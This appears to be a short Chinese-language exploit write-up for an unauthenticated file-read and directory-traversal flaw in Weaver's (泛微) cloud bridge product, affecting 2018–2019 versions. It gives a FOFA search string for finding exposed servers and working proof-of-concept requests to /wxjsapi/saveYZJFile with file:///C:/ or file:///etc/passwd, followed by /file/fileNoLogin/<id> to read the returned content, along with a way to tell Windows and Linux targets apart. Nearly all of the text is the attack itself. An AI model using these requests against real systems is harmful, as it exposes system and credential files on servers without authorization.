摘要:
01影响版本2018-2019多个版本。02fofa语法泛微云桥03漏洞复现如果使用POC回显"无法验证您的身份!"证明改漏洞已被修复POC中,当downloadUrl的路径为文件夹的时候结果为目录遍历linuxwindows通用WindowsPOC:/wxjsapi/saveYZJFile?
01 影响版本
2018-2019 多个版本。
02 fofa语法
泛微云桥
03 漏洞复现
如果使用POC回显"无法验证您的身份!"证明改漏洞已被修复
POC中,当downloadUrl的路径为文件夹的时候结果为目录遍历 linux windows 通用
Windows POC:
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt #查看页面中的id值
/file/fileNoLogin/<id> #访问文件接口,根据上一步获取的id对文件内容进行读取
如果提示msg "/C: (No such file or directory)" 就表示为Linux系统(表示不存在C盘)
Linux POC:
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
/file/fileNoLogin/<id> #访问文件接口,根据上一步获取的id对文件内容进行读取
04 实例
Linux系统主目录(根目录)
Linux中/ect/passwd文件